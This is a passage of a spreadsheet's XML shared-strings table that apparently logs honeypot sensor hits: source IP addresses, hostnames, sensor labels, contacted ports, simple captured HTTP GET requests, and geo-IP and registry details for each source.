  <si>
    <t>115.247.64.254</t>
  </si>
  <si>
    <t>Navi Mumbai (Sector 2)</t>
  </si>
  <si>
    <t>19.1097</t>
  </si>
  <si>
    <t>73.0149</t>
  </si>
  <si>
    <t>::ffff:73f7:40fe</t>
  </si>
  <si>
    <t>f793a14f266efc5d4879dd1cb89e9b49</t>
  </si>
  <si>
    <t>220.133.16.169</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-133-16-169.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H21</t>
  </si>
  <si>
    <t>::ffff:dc85:10a9</t>
  </si>
  <si>
    <t>9443d3f37de611ef3f3346b613daf66e</t>
  </si>
  <si>
    <t>220.135.166.99</t>
  </si>
  <si>
    <t>220-135-166-99.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H30&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;55977&amp;&amp;34736&amp;&amp;34728&amp;&amp;34746&amp;&amp;9100&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:dc87:a663</t>
  </si>
  <si>
    <t>d0abdde91ed46a394019ee7a7e7a9b1b</t>
  </si>
  <si>
    <t>59.126.23.220</t>
  </si>
  <si>
    <t>59-126-23-220.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H25&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;16065&amp;&amp;23&amp;&amp;13791&amp;&amp;59380&amp;&amp;9100&amp;&amp;80&amp;&amp;52907&amp;&amp;43167&amp;&amp;43187&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:17dc</t>
  </si>
  <si>
    <t>d811d8726f4d834920d7928ed6acf91e</t>
  </si>
  <si>
    <t>59.126.185.198</t>
  </si>
  <si>
    <t>59-126-185-198.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>23&amp;&amp;40588&amp;&amp;40606&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:3b7e:b9c6</t>
  </si>
  <si>
    <t>55165832d9974b3ad437e5063496ec34</t>
  </si>
  <si>
    <t>220.134.133.190</t>
  </si>
  <si>
    <t>220-134-133-190.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H36&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;8512&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc86:85be</t>
  </si>
  <si>
    <t>444a75769b0ae412f71298d4021e44f2</t>
  </si>
  <si>
    <t>125.229.164.158</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-164-158.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>23&amp;&amp;19044&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7de5:a49e</t>
  </si>
  <si>
    <t>1d76cc84894d76c147704af2c7692aa1</t>
  </si>
  <si>
    <t>1.34.235.81</t>
  </si>
  <si>
    <t>NA&amp;&amp;1-34-235-81.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H32</t>
  </si>
  <si>
    <t>23&amp;&amp;60100&amp;&amp;39989&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:122:eb51</t>
  </si>
  <si>
    <t>ec0e532a029493e51a315d0b98bf2266</t>
  </si>
  <si>
    <t>125.229.120.41</t>
  </si>
  <si>
    <t>125-229-120-41.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H35</t>
  </si>
  <si>
    <t>::ffff:7de5:7829</t>
  </si>
  <si>
    <t>3e38556affa0a33e68fa0823a6670153</t>
  </si>
  <si>
    <t>49.37.162.31</t>
  </si>
  <si>
    <t>::ffff:3125:a21f</t>
  </si>
  <si>
    <t>b892ef01b031d5cf6780b9253a90e025</t>
  </si>
  <si>
    <t>217.11.165.105</t>
  </si>
  <si>
    <t>NA&amp;&amp;105-165.cdn.ge</t>
  </si>
  <si>
    <t>55586&amp;&amp;23</t>
  </si>
  <si>
    <t>Tbilisi</t>
  </si>
  <si>
    <t>41.6941</t>
  </si>
  <si>
    <t>44.8337</t>
  </si>
  <si>
    <t>24997</t>
  </si>
  <si>
    <t>Caucasus Digital Network LTD</t>
  </si>
  <si>
    <t>CDN-165/24</t>
  </si>
  <si>
    <t>2002-06-07</t>
  </si>
  <si>
    <t>2000-07-04 00:00:00</t>
  </si>
  <si>
    <t>2025-07-05 00:00:00</t>
  </si>
  <si>
    <t>['ns.cdn.ge', 'ns2.cdn.ge']</t>
  </si>
  <si>
    <t>grena</t>
  </si>
  <si>
    <t>Ok</t>
  </si>
  <si>
    <t>!misha@sdnge.com</t>
  </si>
  <si>
    <t>::ffff:d90b:a569</t>
  </si>
  <si>
    <t>9b564d23871285da45362b93cd0fd7cc</t>
  </si>
  <si>
    <t>103.100.178.225</t>
  </si>
  <si>
    <t>Bharthana Kosad</t>
  </si>
  <si>
    <t>13157056</t>
  </si>
  <si>
    <t>21.2666</t>
  </si>
  <si>
    <t>72.8709</t>
  </si>
  <si>
    <t>133246</t>
  </si>
  <si>
    <t>softnet network</t>
  </si>
  <si>
    <t>2023-03-02</t>
  </si>
  <si>
    <t>SNPLSURAT</t>
  </si>
  <si>
    <t>::ffff:6764:b2e1</t>
  </si>
  <si>
    <t>d0c83561cd9ff297b6fbdfdcdd66f0cf</t>
  </si>
  <si>
    <t>133.175.255.231</t>
  </si>
  <si>
    <t>133-175-255-231.tokyo.fdn.vectant.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>Koto</t>
  </si>
  <si>
    <t>Tōyō</t>
  </si>
  <si>
    <t>1864055</t>
  </si>
  <si>
    <t>35.6698</t>
  </si>
  <si>
    <t>139.815</t>
  </si>
  <si>
    <t>2519</t>
  </si>
  <si>
    <t>ARTERIA Networks Corporation</t>
  </si>
  <si>
    <t>Toray Industries, Inc.</t>
  </si>
  <si>
    <t>['ns1.vectant.ne.jp', 'ns2.vectant.ne.jp']</t>
  </si>
  <si>
    <t>Connected (2025/09/30)</t>
  </si>
  <si>
    <t>::ffff:85af:ffe7</t>
  </si>
  <si>
    <t>0bc9c2d797bb18f7c780c9f1ae03e9d2</t>
  </si>
  <si>
    <t>220.134.133.35</t>
  </si>
  <si>
    <t>220-134-133-35.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_VNC_H42&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_HTTP_H38&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;389&amp;&amp;5900&amp;&amp;9100&amp;&amp;1080&amp;&amp;80&amp;&amp;57215&amp;&amp;23&amp;&amp;34407&amp;&amp;37264&amp;&amp;37269&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc86:8523</t>
  </si>
  <si>
    <t>9c0714a4eac908a27c6cbd51a79b4c3b</t>
  </si>
  <si>
    <t>82.20.10.221</t>
  </si>
  <si>
    <t>cpc91730-watf12-2-0-cust220.15-2.cable.virginm.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>Hertfordshire</t>
  </si>
  <si>
    <t>Watford</t>
  </si>
  <si>
    <t>2634677</t>
  </si>
  <si>
    <t>WD1</t>
  </si>
  <si>
    <t>51.6565</t>
  </si>
  <si>
    <t>-0.39032000000000006</t>
  </si>
  <si>
    <t>::ffff:5214:add</t>
  </si>
  <si>
    <t>8f461351b28e495bd5d9616d7839894a</t>
  </si>
  <si>
    <t>49.213.231.93</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_SSH_H10&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_HTTP_H27&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;22&amp;&amp;9100&amp;&amp;5900&amp;&amp;80&amp;&amp;1384&amp;&amp;23&amp;&amp;61264&amp;&amp;60056&amp;&amp;60110&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:31d5:e75d</t>
  </si>
  <si>
    <t>9fb7d98b0a806bf7745944c0ea01acc6</t>
  </si>
  <si>
    <t>61.220.216.233</t>
  </si>
  <si>
    <t>NA&amp;&amp;61-220-216-233.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>23&amp;&amp;80&amp;&amp;36967&amp;&amp;52749&amp;&amp;13316&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3ddc:d8e9</t>
  </si>
  <si>
    <t>4eb05025ae73d9f31ba2b12b883ea6ad</t>
  </si>
  <si>
    <t>189.216.40.171</t>
  </si>
  <si>
    <t>28548</t>
  </si>
  <si>
    <t>AS28548</t>
  </si>
  <si>
    <t>Cablevisión, S.A. de C.V.</t>
  </si>
  <si>
    <t>Cablevisión, S.A. de C.V</t>
  </si>
  <si>
    <t>::ffff:bdd8:28ab</t>
  </si>
  <si>
    <t>7567d197fe584657fdd407cb8c27516e</t>
  </si>
  <si>
    <t>49.213.185.228</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:31d5:b9e4</t>
  </si>
  <si>
    <t>cbce3571219001ed46a7eea193659d27</t>
  </si>
  <si>
    <t>76.125.131.104</t>
  </si>
  <si>
    <t>c-76-125-131-104.hsd1.pa.comcast.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>23&amp;&amp;29573&amp;&amp;52736&amp;&amp;NA</t>
  </si>
  <si>
    <t>Blairsville</t>
  </si>
  <si>
    <t>5180834</t>
  </si>
  <si>
    <t>15717</t>
  </si>
  <si>
    <t>40.4312</t>
  </si>
  <si>
    <t>-79.2609</t>
  </si>
  <si>
    <t>::ffff:4c7d:8368</t>
  </si>
  <si>
    <t>a417c756093bdf0eb3183c960e58d918</t>
  </si>
  <si>
    <t>119.198.52.17</t>
  </si>
  <si>
    <t>Busan (Chungjang-daero 5beon-gil)</t>
  </si>
  <si>
    <t>1838524</t>
  </si>
  <si>
    <t>35.1111</t>
  </si>
  <si>
    <t>2008-02-26</t>
  </si>
  <si>
    <t>::ffff:77c6:3411</t>
  </si>
  <si>
    <t>e8ef56ba99bb6ba8f331fcfe19508fa3</t>
  </si>
  <si>
    <t>117.203.231.137</t>
  </si>
  <si>
    <t>::ffff:75cb:e789</t>
  </si>
  <si>
    <t>469384124bccf25a4b6ebb2fce326564</t>
  </si>
  <si>
    <t>138.75.34.66</t>
  </si>
  <si>
    <t>1990-03-02</t>
  </si>
  <si>
    <t>M1LIMITED-SG</t>
  </si>
  <si>
    <t>::ffff:8a4b:2242</t>
  </si>
  <si>
    <t>7d3537df6ae1534974359b5f9288190f</t>
  </si>
  <si>
    <t>117.241.184.207</t>
  </si>
  <si>
    <t>::ffff:75f1:b8cf</t>
  </si>
  <si>
    <t>be8ad14e8ae25065f2e832e04eed20ca</t>
  </si>
  <si>
    <t>117.233.153.85</t>
  </si>
  <si>
    <t>::ffff:75e9:9955</t>
  </si>
  <si>
    <t>94c3c43528e344c8a5b5a2aac99c1dcb</t>
  </si>
  <si>
    <t>113.190.233.19</t>
  </si>
  <si>
    <t>Thanh Xuân District</t>
  </si>
  <si>
    <t>Thanh Xuân</t>
  </si>
  <si>
    <t>8616118</t>
  </si>
  <si>
    <t>20.9947</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (113.190.233.19,63862)}&amp;&amp;{Data_SMB:Incoming connection (113.190.233.19,64271)}</t>
  </si>
  <si>
    <t>::ffff:71be:e913</t>
  </si>
  <si>
    <t>f81848c8dcb33ca1e5687a573ddef197</t>
  </si>
  <si>
    <t>59.180.133.122</t>
  </si>
  <si>
    <t>::ffff:3bb4:857a</t>
  </si>
  <si>
    <t>f2c3a5d5ee07d020ade3e774edcc0bd2</t>
  </si>
  <si>
    <t>175.141.193.174</t>
  </si>
  <si>
    <t>::ffff:af8d:c1ae</t>
  </si>
  <si>
    <t>120edb22f3054e5af9008c9a78615f3a</t>
  </si>
  <si>
    <t>1.34.92.38</t>
  </si>
  <si>
    <t>1-34-92-38.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>::ffff:122:5c26</t>
  </si>
  <si>
    <t>478c505682984ecf6baa2c8b35b57607</t>
  </si>
  <si>
    <t>138.75.59.79</t>
  </si>
  <si>
    <t>Kangkar</t>
  </si>
  <si>
    <t>1882402</t>
  </si>
  <si>
    <t>1.3761100000000002</t>
  </si>
  <si>
    <t>103.902</t>
  </si>
  <si>
    <t>::ffff:8a4b:3b4f</t>
  </si>
  <si>
    <t>ce3356fc98f08a4decda9f9393d84cfa</t>
  </si>
  <si>
    <t>117.216.19.175</t>
  </si>
  <si>
    <t>::ffff:75d8:13af</t>
  </si>
  <si>
    <t>2222ebbba22592b17bbc50424a4f4668</t>
  </si>
  <si>
    <t>125.99.208.245</t>
  </si>
  <si>
    <t>2005-09-21</t>
  </si>
  <si>
    <t>::ffff:7d63:d0f5</t>
  </si>
  <si>
    <t>9a6a73a9140480077f31689a50126d32</t>
  </si>
  <si>
    <t>41.60.144.196</t>
  </si>
  <si>
    <t>30844</t>
  </si>
  <si>
    <t>Liquid Telecommunications Ltd</t>
  </si>
  <si>
    <t>Maintainer Liquid Telecommunications Operations Limited</t>
  </si>
  <si>
    <t>Liquid Telecommunications Operations Limited</t>
  </si>
  <si>
    <t>::ffff:293c:90c4</t>
  </si>
  <si>
    <t>a230d7ca32850905f25670a3bc53a126</t>
  </si>
  <si>
    <t>65.130.44.45</t>
  </si>
  <si>
    <t>NA&amp;&amp;65-130-44-45.slkc.qwest.net</t>
  </si>
  <si>
    <t>Salt Lake City</t>
  </si>
  <si>
    <t>84138</t>
  </si>
  <si>
    <t>40.7608</t>
  </si>
  <si>
    <t>-111.891</t>
  </si>
  <si>
    <t>209</t>
  </si>
  <si>
    <t>CenturyLink Communications, LLC</t>
  </si>
  <si>
    <t>2000-08-23</t>
  </si>
  <si>
    <t>CENTURYLINK-LEGACY-QWEST-INET-18</t>
  </si>
  <si>
    <t>2018-02-21</t>
  </si>
  <si>
    <t>1995-08-28 04:00:00</t>
  </si>
  <si>
    <t>2025-08-27 04:00:00</t>
  </si>
  <si>
    <t>2023-08-23 05:15:15</t>
  </si>
  <si>
